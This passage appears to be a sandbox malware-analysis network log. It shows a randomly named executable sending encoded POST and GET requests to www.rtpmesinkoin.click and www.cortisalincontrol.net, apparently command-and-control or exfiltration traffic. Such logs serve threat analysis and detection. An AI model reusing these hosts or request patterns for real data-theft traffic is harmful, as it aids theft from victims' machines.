                                                                                                                                                                                Nov 29, 2024 09:18:09.264436960 CET810OUTPOST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 66 79 47 44 54 6c 36 7a 43 59 6e 75 67 59 61 53 42 39 63 4f 44 78 4b 63 6f 48 47 2f 2f 44 46 51 33 6b 6c 39 4d 6b 78 66 37 6c 64 5a 4c 46 75 44 31 68 39 75 32 49 79 79 34 73 64 78 76 74 41 61 6a 66 74 33 4c 51 6b 70 58 4b 51 47 68 61 31 75 37 30 71 71 51 48 67 38 65 48 75 2b 64 61 58 38 54 61 57 4a 73 30 4a 59 79 4c 6f 72 36 70 66 74 4b 54 63 38 53 44 69 7a 50 68 4b 43 76 66 45 63 4b 31 76 42 45 77 30 73 63 33 31 36 49 6b 77 73 52 38 69 67 62 50 34 53 45 58 7a 4f 59 6e 32 32 6b 73 78 4a 75 41 64 4b 47 38 38 6d 35 5a 33 62 58 79 41 79 30 68 4d 4f 52 78 54 68 54 6a 52 6e 50 70 4c 6e 7a 4d 4f 71 43 41 3d
                                                                                                                                                                                Data Ascii: JZOtU=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//DFQ3kl9Mkxf7ldZLFuD1h9u2Iyy4sdxvtAajft3LQkpXKQGha1u70qqQHg8eHu+daX8TaWJs0JYyLor6pftKTc8SDizPhKCvfEcK1vBEw0sc316IkwsR8igbP4SEXzOYn22ksxJuAdKG88m5Z3bXyAy0hMORxThTjRnPpLnzMOqCA=
                                                                                                                                                                                Nov 29, 2024 09:18:10.557490110 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:10 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                31192.168.2.450020155.94.253.4801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:11.938196898 CET10892OUTPOST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 66 79 47 44 54 6c 36 7a 43 59 6e 75 67 59 61 53 42 39 63 4f 44 78 4b 63 6f 48 47 2f 2f 62 46 54 42 77 6c 38 72 77 78 65 37 6c 64 61 4c 46 74 44 31 68 6b 75 79 73 32 79 34 77 4e 78 74 46 41 56 67 48 74 78 35 30 6b 7a 48 4b 51 5a 78 61 30 67 62 30 2f 71 54 2f 65 38 61 6a 75 2b 64 61 58 38 52 43 57 66 4a 55 4a 65 79 4c 6e 68 61 70 54 36 36 53 53 38 53 37 79 7a 50 73 39 43 66 2f 45 5a 65 5a 76 47 33 49 30 7a 73 33 33 39 49 6b 53 73 52 41 35 67 66 75 4a 53 45 4c 4a 4f 59 54 32 79 54 31 6e 63 39 63 53 65 30 6b 48 39 4f 35 32 53 58 61 67 78 6d 68 69 41 43 39 5a 2f 57 44 69 6e 64 34 53 79 77 35 46 35 69 6e 66 58 76 39 61 64 63 7a 41 50 38 6b 48 6d 4a 4f 72 6f 6f 6b 51 37 67 63 4c 68 34 33 77 4f 57 59 50 58 4a 43 31 64 37 51 48 44 35 55 4f 31 6e 7a 74 54 75 33 53 6e 5a 55 38 70 4d 4b 41 32 75 39 6b 47 4e 5a 62 70 74 4f 62 49 71 2f 46 59 7a 34 45 61 7a 4d 38 6a 57 33 46 2b 6f 69 30 36 49 6f 63 51 66 6e 46 70 78 6a 2f 2f 38 67 57 79 5a 46 53 39 44 53 69 [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//bFTBwl8rwxe7ldaLFtD1hkuys2y4wNxtFAVgHtx50kzHKQZxa0gb0/qT/e8aju+daX8RCWfJUJeyLnhapT66SS8S7yzPs9Cf/EZeZvG3I0zs339IkSsRA5gfuJSELJOYT2yT1nc9cSe0kH9O52SXagxmhiAC9Z/WDind4Syw5F5infXv9adczAP8kHmJOrookQ7gcLh43wOWYPXJC1d7QHD5UO1nztTu3SnZU8pMKA2u9kGNZbptObIq/FYz4EazM8jW3F+oi06IocQfnFpxj//8gWyZFS9DSiE5SwodeNh/pTWBlM5eV8DkI+RLljvDWkimZH+t55yr3WmxcaisgPRxvlJLCxvMVXuNRt6diM/uA5NS7+v+5iC0CmPE7jN4tzNMBNA31CQrdukoEA61scCICO5la+rlCC8QcHmgLma7vGNM+9x/HY1EsazulacWDBjjtfpibA454FrNe423ZIZ9AcNiVSnkvewW4PGu5UtUW4oHlEnEezuzR7Pp1Hmw0VpWL9s31jDh8p8fMOzvDs/RNVc0r+OPgr4n3C79Uc4KEly5+KLXMqPg1RmLSJEAziVSa8+JBjCYOiURgxpfglh+XBB6dyQsQ2+hQFcSFmSm8LQBM9uXLZP8V8S+Ujck3T67eR52MgWelz/sIGN00tQkMXxMUZvwEuw5UApg1Ki6G3JsvCCYgdAFRIFJH4Fd4TaVJY2uLnLgrI0vH19fPtt5cWOyFRKEh8zzpPI6rfJmGvn6Klo3J7H8+yh1UNy98gq4Vnaccd/TL8Fmav5AzNYvH8ZcSzmDpHkeyNNbC8NEGLrN7lb7yKAzgMH+UkDB+SNRwiqfcWKcwqCL2SQd+i9NArB1AjKivGlkfJtDs8FBzfD3a2P1iO1gfImxHLgyJI5Ob+0Gj82mcjeDwO1hVCtmtVJWzwiZMpjZddhxE4RnhqTFkES5ppP6zpq9N6XePG12 [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:13.133554935 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:12 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                32192.168.2.450021155.94.253.4801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:14.605983019 CET512OUTGET /fsgl/?JZOtU=C9QsHkK47GSD7r6QEBJq03ghiAkwTDhYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9Fm2iWKgKq9aIKjjivs8jTrOy3xS+oUeAgIDw=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:18:15.858202934 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:15 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                33192.168.2.450022208.91.197.27801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:21.652508020 CET799OUTPOST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 6c 77 6c 79 68 66 30 53 30 31 38 49 6c 35 77 64 4f 6f 6b 77 48 57 64 5a 39 46 2f 49 77 4e 6e 32 6a 51 6f 44 71 41 34 65 46 55 36 36 6b 71 33 6f 70 39 6e 79 4e 79 72 35 7a 38 33 63 39 4f 49 45 63 52 69 66 33 43 45 37 66 48 50 66 54 64 76 43 6e 2b 6c 62 51 59 74 48 75 6a 72 48 66 33 4a 54 31 55 56 51 73 66 39 56 57 6b 42 74 6a 30 77 33 39 4b 6b 57 51 30 37 56 5a 45 33 32 6e 49 37 62 6a 5a 73 41 70 45 30 56 66 77 79 75 42 53 78 74 6c 46 62 37 64 5a 56 39 71 42 4e 57 4f 52 64 75 7a 77 36 78 42 2f 76 76 55 6b 68 39 63 65 76 54 42 39 4e 51 41 41 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=9mZWOizSlj6vlwlyhf0S018Il5wdOokwHWdZ9F/IwNn2jQoDqA4eFU66kq3op9nyNyr5z83c9OIEcRif3CE7fHPfTdvCn+lbQYtHujrHf3JT1UVQsf9VWkBtj0w39KkWQ07VZE32nI7bjZsApE0VfwyuBSxtlFb7dZV9qBNWORduzw6xB/vvUkh9cevTB9NQAA==


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                34192.168.2.450023208.91.197.27801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:24.310187101 CET819OUTPOST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 30 67 56 79 6e 38 63 53 38 31 38 50 70 5a 77 64 41 49 6b 38 48 57 52 5a 39 42 48 68 78 37 2f 32 6a 31 55 44 70 42 34 65 41 55 36 36 33 71 32 69 6b 64 6e 35 4e 79 57 47 7a 35 58 63 39 4f 63 45 63 54 4b 66 72 6a 45 30 64 58 50 64 4e 39 76 41 70 65 6c 62 51 59 74 48 75 6a 57 51 66 78 68 54 30 6e 39 51 76 36 4a 53 51 55 42 75 79 30 77 33 73 36 6b 53 51 30 36 47 5a 46 61 74 6e 4b 7a 62 6a 63 41 41 71 56 30 55 47 41 79 6f 46 53 78 38 31 48 61 69 62 70 4d 46 30 48 64 34 54 51 46 4d 37 57 33 72 51 4f 4f 34 47 6b 46 4f 42 5a 6d 6e 4d 2b 77 5a 62 4f 64 6f 44 72 6e 69 5a 36 61 31 78 50 2f 31 4a 63 61 62 47 62 38 3d
                                                                                                                                                                                Data Ascii: JZOtU=9mZWOizSlj6v0gVyn8cS818PpZwdAIk8HWRZ9BHhx7/2j1UDpB4eAU663q2ikdn5NyWGz5Xc9OcEcTKfrjE0dXPdN9vApelbQYtHujWQfxhT0n9Qv6JSQUBuy0w3s6kSQ06GZFatnKzbjcAAqV0UGAyoFSx81HaibpMF0Hd4TQFM7W3rQOO4GkFOBZmnM+wZbOdoDrniZ6a1xP/1JcabGb8=


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                35192.168.2.450024208.91.197.27801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:26.970633030 CET10901OUTPOST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 30 67 56 79 6e 38 63 53 38 31 38 50 70 5a 77 64 41 49 6b 38 48 57 52 5a 39 42 48 68 78 37 33 32 6a 6a 67 44 72 69 41 65 44 55 36 36 73 4b 32 6a 6b 64 6e 6b 4e 32 43 43 7a 35 54 69 39 4d 6b 45 63 79 71 66 37 51 63 30 48 48 50 64 58 64 76 46 6e 2b 6c 4f 51 59 39 63 75 6a 6d 51 66 78 68 54 30 69 35 51 37 2f 39 53 4c 55 42 74 6a 30 77 46 39 4b 6b 71 51 30 43 57 5a 46 65 39 6e 2b 2f 62 67 38 51 41 6c 48 63 55 5a 77 79 71 41 53 77 68 31 48 57 48 62 70 52 38 30 48 42 53 54 51 68 4d 2f 69 65 72 4d 73 36 30 63 6c 5a 32 44 35 6e 4e 58 4e 63 35 51 66 67 51 44 71 44 31 44 37 65 6b 38 50 36 50 56 5a 66 63 58 62 49 4a 75 48 66 49 37 5a 4d 5a 68 7a 45 35 32 50 52 44 58 56 34 6e 79 42 56 7a 4d 71 70 31 79 76 69 42 61 62 56 7a 63 43 48 6a 7a 44 51 76 36 5a 68 79 74 4e 57 76 2f 39 69 6a 48 69 51 73 5a 33 44 2f 2b 56 4e 36 4a 72 77 55 6e 53 68 7a 69 6a 61 6b 79 44 31 42 77 33 38 53 5a 71 33 77 64 4e 77 54 54 46 33 6d 4a 64 33 79 61 58 48 53 39 53 48 39 30 6c 78 46 [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=9mZWOizSlj6v0gVyn8cS818PpZwdAIk8HWRZ9BHhx732jjgDriAeDU66sK2jkdnkN2CCz5Ti9MkEcyqf7Qc0HHPdXdvFn+lOQY9cujmQfxhT0i5Q7/9SLUBtj0wF9KkqQ0CWZFe9n+/bg8QAlHcUZwyqASwh1HWHbpR80HBSTQhM/ierMs60clZ2D5nNXNc5QfgQDqD1D7ek8P6PVZfcXbIJuHfI7ZMZhzE52PRDXV4nyBVzMqp1yviBabVzcCHjzDQv6ZhytNWv/9ijHiQsZ3D/+VN6JrwUnShzijakyD1Bw38SZq3wdNwTTF3mJd3yaXHS9SH90lxFj4K2r8nOn/+BwsMqfFnx5j1zRJ4LgxAQxOeWuzZB7xB3g4aydjLtgj/F4sq9qvb0y/ILESt2D1qaybERlX/bONyNsRBsWBZnOr7YK2eUAZ63nHklapcwiV5soC8udewYsJ5MOWRwHGVH9hLTI2HkNdQhSs/knOWr3eJAwtxjo+LxVtMyw7jZTw20lMvikxxovWqhss4bQWsXvg2n3ysEdKpLXdJ8YGG9zYkAtfKtNZb+fCgur5ysfV4tr4A8SSZWDUSLY+3jGr+B1msdt3MUpGnqHySNu+p8E+H6QHW86xPs90p14c435Agi0hwQQfRoKLxiP2p7TX5V8r2pwDMD5wr2nJPp19ztREXNCxDK1Uv0z/U+Yhj8q18sH6jWZi+MiHYvMIXGTToyt6+76Lka2IfEmxxToPw3SSCPd6IDroYkDxQa4IoiGjBdHRFGdOrBv9RdwoIN+ZSyv7joOa7Qq94yiz8pYxGSlBLqcS/1cRvSQcbz7sGT10cX0kWUJYoEnOuDXXaSdgSPlaHGHBRbTiguT65s5GyGk4FBF3IWPHmEkzDmb82ctBng8Ff6yOb9DglFY59tEX10IdSgbtqkfdZ2SPIyik5f7HNX2BL2eARrrmDMaV5thjTBbUX/7CgHfh5fNrw4/BvicbHYQv3JsFPb21kyt4NCNn [TRUNCATED]


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                36192.168.2.450025208.91.197.27801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:29.630059004 CET515OUTGET /cbfz/?JZOtU=wkx2NXiTkimKkWVHj8I851tghrwYfKl5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXS0bDb8L6xc5FYKVawF3pRnx98U9Wx8trKU0=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:18:31.437751055 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:30 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                Set-Cookie: vsid=907vr4804139107723603; expires=Wed, 28-Nov-2029 08:18:30 GMT; Max-Age=157680000; path=/; domain=www.cortisalincontrol.net; HttpOnly
                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mp4/YdyiFApSYOesm81kvj2Khq1KgzDsoapo3dqfmpulzgI+V5WC5yr72JYSrepB2ogA4w1EosUWmA1mLdt9Yg==
                                                                                                                                                                                Transfer-Encoding: chunked
